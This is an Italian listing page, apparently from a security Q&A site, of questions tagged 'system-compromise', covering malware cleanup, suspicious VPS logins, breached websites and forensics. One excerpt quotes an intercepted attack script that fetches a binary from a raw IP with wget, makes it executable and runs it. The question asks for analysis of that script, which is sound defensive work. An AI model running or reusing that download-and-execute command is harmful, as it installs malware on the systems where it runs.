Domande con tag 'system-compromise'

10
risposte

Come spieghi la necessità di "nuotare dall'orbita" alla direzione e agli utenti?

Quando una macchina è stata infettata da malware, la maggior parte di noi qui identifica immediatamente l'azione appropriata come "nuke da orbita", ovvero elimina il sistema e ricomincia da capo. Sfortunatamente, questo è spesso costoso per un'a...
posta 19.11.2012 - 14:59
10
risposte

Dovrei essere preoccupato se l '"FBI" ha effettuato il login sul mio Ubuntu VPS?

Ieri stavo eseguendo un po 'di manutenzione generale su un VPS, utilizzando la console IPMI fornita dal mio host. Dopo aver configurato nuovamente le chiavi SSH tramite la console IPMI, ho effettuato l'accesso tramite SSH e sono rimasto scioc...
posta 18.09.2016 - 16:38
8
risposte

In che modo Twitter e GitHub possono essere sicuri di non essere stati violati?

Ieri, Twitter anounced che di recente identificato un bug che memorizzava le password smascherate in un log interno. Recentemente, Github ha anche un bug simile . In entrambi i casi, affermano che nessuno ha avuto accesso a questi file. Tw...
posta 04.05.2018 - 10:11
7
risposte

E 'possibile che la persona seduta di fronte a me a Starbucks stia cercando di hackerare il mio portatile?

Stavo usando il mio portatile a uno Starbucks su un tavolo, e una persona stava usando un portatile sullo stesso tavolo di fronte a me, un paio di sedie al mio fianco. Fece scattare qualcosa di plastica sul tavolo verso il mio portatile. Quello...
posta 15.12.2014 - 07:56
4
risposte

Una versione minuscola di wget (51 byte?)

In questo articolo ISC su DVR compromesso l'autore parla del compromesso di un sistema embedded. In particolare, l'utente malintenzionato esegue una serie di comandi echo sull'host remoto e: This DVR has no "upload" feature. There is...
posta 05.05.2014 - 16:20
7
risposte

Un'agenzia governativa ha inviato al nostro sito web un messaggio di posta elettronica che il nostro sito Web era stato deturpato

Abbiamo ricevuto un'e-mail ufficiale che diceva che il nostro sito Web era stato violato. Hanno citato l'URL da utilizzare per vedere il nuovo file sospetto che era stato rilasciato nella nostra cartella principale Web ( s.htm ). Solo un tes...
posta 20.01.2017 - 20:36
1
risposta

Un server dovrebbe essere considerato compromesso semplicemente perché una porta era aperta?

Oggi ho ricevuto una notifica di un incidente di sicurezza a Mandrill . All'inizio ero preoccupato, ma poi, dopo essermi immerso nei dettagli, mi sono confuso sul motivo per cui consideravano questo degno di nota. Per riassumere, sembra che...
posta 19.03.2015 - 02:12
3
risposte

Cosa fa questo sh script se eseguito?

Ho intercettato un attacco al mio server web che ritengo non abbia avuto successo. L'autore dell'attacco ha tentato di eseguire questo script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/...
posta 15.03.2014 - 21:43
5
risposte

Ricerca forense: quale sistema operativo usare [chiuso]

Mi è stato assegnato un incarico dalla mia scuola, in cui mi è stata data un'immagine virtuale di un sistema compromesso. La prima cosa che devo fare è impostare un ambiente in cui possiamo montare l'immagine. Ho bisogno di scegliere un sistema...
posta 10.02.2014 - 13:11
5
risposte

Come si può aggiungere un file PHP più e più volte al mio sito compromesso?

Sono su un piano di hosting condiviso (lo so, lo so) su GoDaddy e tutti i file in esso contenuti sono stati violati. Ci sono più siti nel piano, ognuno di essi ha una cartella. Le cartelle e le sottocartelle di ogni sito sono piene di file compr...
posta 03.11.2016 - 20:35